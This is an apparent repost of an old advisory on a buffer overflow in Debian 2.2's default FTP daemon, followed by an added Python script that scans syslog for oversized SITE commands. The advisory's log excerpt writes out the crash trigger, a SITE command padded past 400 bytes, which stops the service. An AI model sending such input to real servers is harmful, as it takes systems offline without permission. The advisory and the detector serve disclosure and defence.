Debian FTP Daemon Vulnerable to Buffer Overflow (SITE)
> SecuriTeam web site: http://www.securiteam.com
>
> Debian FTP Daemon Vulnerable to Buffer Overflow (SITE)
> ------------------------------------------------------------------------
>
> SUMMARY
>
> A security vulnerability in Debian FTP Daemon has been discovered. The
> vulnerability arises when a buffer of 400 bytes or more is sent to the
> FTPd daemon in a SITE command.
>
> DETAILS
>
> Vulnerable systems:
> Debian 2.2 is 2.2r3 default FTPd daemon Version 6.2/OpenBSD/Linux-0.10
>
> Example:
> May 18 12:32:46 ts ftpd[677]: ts FTP server (Version
> 6.2/OpenBSD/Linux-0.10) ready.
> May 18 12:32:47 ts ftpd[677]: command: SITE
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAA
> May 18 12:32:47 ts ftpd[677]: <--- 500
> May 18 12:32:47 ts ftpd[677]: 'SITE
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAA
> ': command not understood.
> May 18 12:32:47 ts ftpd[677]: <--- 221
> May 18 12:32:47 ts ftpd[677]: You could at least say goodbye.
> May 18 12:32:47 ts inetd[139]: ftp/tcp server failing (looping), service
> terminated
>
>
> ADDITIONAL INFORMATION
>
> The information has been provided by <mailto:feedback@tamersahin.net>
> Tamer Sahin.
[ ]'s
*************************** .''`.
* cosmo@hackhour.com.br * : :' :
* www.hackhour.com.br * `. `'`
* Hack Hour Inc. * `-
*************************** Debian
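
A log check for the pattern in the quoted advisory, as an added example that is not part of the original message or of the advisory: it rejoins wrapped syslog lines, flags ftpd SITE commands whose argument reaches the 400-byte figure, and records whether inetd later stopped the ftp service on the same host. The sample log lines are constructed, and the function names are this example's own.

```python
import re

THRESHOLD = 400  # advisory figure: "a buffer of 400 bytes or more" in a SITE command
HEADER = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) (\S+) (\w+)\[(\d+)\]: (.*)$")

def records(lines):
    """Rejoin wrapped text: a line with no syslog header continues the previous record."""
    out = []
    for line in lines:
        m = HEADER.match(line.rstrip("\n"))
        if m:
            out.append(list(m.groups()))
        elif out:
            out[-1][4] += " " + line.strip()
    return out

def find_oversized_site(lines, threshold=THRESHOLD):
    """Return one finding per ftpd SITE command whose argument is >= threshold bytes."""
    recs, findings = records(lines), []
    for i, (ts, host, prog, pid, msg) in enumerate(recs):
        m = re.match(r"command: SITE\b\s*(.*)$", msg, re.S | re.I)
        if prog != "ftpd" or not m:
            continue
        # Whitespace is dropped because line wrapping may have inserted it,
        # so the count is a lower bound on what the client sent.
        size = len(re.sub(r"\s+", "", m.group(1)))
        if size < threshold:
            continue
        stopped = any(p == "inetd" and h == host and "ftp/tcp server failing" in t
                      for _, h, p, _, t in recs[i + 1:])
        findings.append({"time": ts, "host": host, "pid": int(pid),
                         "arg_bytes": size, "inetd_terminated": stopped})
    return findings

# Constructed sample log, modelled on the excerpt in the advisory.
SAMPLE = [
    "May 18 12:32:46 ts ftpd[677]: ts FTP server (Version",
    "6.2/OpenBSD/Linux-0.10) ready.",
    "May 18 12:32:47 ts ftpd[677]: command: SITE",
    "A" * 200,
    "A" * 200,
    "May 18 12:32:47 ts ftpd[677]: <--- 500",
    "May 18 12:32:47 ts inetd[139]: ftp/tcp server failing (looping), service",
    "terminated",
    "May 18 12:40:02 ts ftpd[702]: command: SITE CHMOD 644 index.html",
]

if __name__ == "__main__":
    for finding in find_oversized_site(SAMPLE):
        print(finding)
```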